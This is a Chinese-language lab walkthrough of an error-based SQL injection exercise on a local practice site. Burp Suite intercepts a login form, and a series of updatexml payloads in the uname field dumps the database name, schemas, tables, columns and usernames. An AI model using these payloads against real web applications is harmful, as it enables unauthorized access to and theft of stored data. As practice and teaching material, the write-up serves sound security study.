一、这一关开始是post型注入,选择用burp suite代理,开启拦截(intercept is on)
二、打开第11关,用bp拦截的话要把url的127.0.0.1改为本机的ip,要不然bp检测不到
三、提交表单发现页面开始转圈圈等待,bp也拦截到了报文
四、点击action,选择send to repeater,然后打开repeater模块
五、开始注入,在uname=后加1’,然后点击go,在右面的response查看返回的界面,发现界面有显示数据库错误信息
六、证明有注入点后,判断闭合方式,添加注释符然后go,发现页面不再报错,则为单引号闭合
uname=1'#&passwd=&submit=Submit
七、因为会显示数据库错误信息,所以选择报错注入,先来爆当前数据库
uname=1' and updatexml(1,concat('^',database()),1)#&passwd=&submit=Submit
八、爆所有数据库,可更改limit来更换显示
uname=1' and updatexml(1,concat('^',(select schema_name from information_schema.schemata limit 0,1)),1)#&passwd=&submit=Submit
九、爆指定库所有表
uname=1' and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema=database() limit 1,1)),1)#&passwd=&submit=Submit
十、爆指定表所有列名
uname=1' and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users' limit 0,1)),1)#&passwd=&submit=Submit
十一、爆指定列所有数据
uname=1' and updatexml(1,concat('^',(select username from users limit 0,1)),1)#&passwd=&submit=Submit
over~
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
